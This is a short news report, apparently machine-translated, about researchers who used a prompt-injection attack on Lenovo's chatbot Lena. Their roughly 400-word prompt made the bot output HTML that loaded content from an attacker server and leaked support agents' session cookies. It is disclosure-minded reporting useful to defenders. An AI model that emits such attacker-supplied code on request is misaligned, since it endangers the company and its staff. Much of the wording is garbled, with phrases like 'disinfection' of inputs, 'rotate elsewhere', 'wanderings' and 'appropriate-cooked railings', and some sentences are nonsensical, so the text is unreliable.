- The researchers found a way to deceive
- Lena shared active session cookies with researchers
- Malicious prompts could be used for a wide variety of attacks
Lena, the chatbot propelled by Chatgpt appearing on the Lenovo website, could be transformed into a malicious initiate, secrets of the reversal company or by performing malicious software, using nothing more than a convincing prompt, experts warned.
Security researchers at Cyberness has succeeded in obtaining active session cookies from human customer support agents, essentially to take their accounts, to access sensitive data and potentially rotate elsewhere in the business network.
“The discovery highlights several security problems: poor disinfection of user inputs, incorrect chatbot output disinfection, the web server does not check the content produced by the chatbot, running unaccounted code and loading content from arbitrary web resources.
“Massive safety surveillance”
At the heart of the problem, they said, the fact that chatbots are “pleasant people”. Without appropriate-cooked railings, they will do what they are told, and they are unable to distinguish a benign demand from a malicious person.
In this case, Cyberness The researchers wrote a 400 -words prompt in which the chatbot was invited to generate an HTML response.
The answer contained secret instructions to access resources from a server under the control of attackers, with instructions to send the data obtained from the customer browser.
They also pointed out that, while their tests led to the theft of session cookies, the end result could be almost anything.
“This is not limited to theft of cookies. It may also be possible to execute certain system commands, which could allow the installation of wanderings and lateral movement to other servers and computers of the network”, ” Cyberness explain.
“We haven’t tried any of this,” they added.
After informing Lenovo of his conclusions, Cyberness He was told that the technology giant “protected its systems”, without detailing exactly what has been done – “massive security surveillance” with potentially devastating consequences.
Researchers have urged all companies using chatbots to assume that all the results are “potentially malicious” and to act accordingly.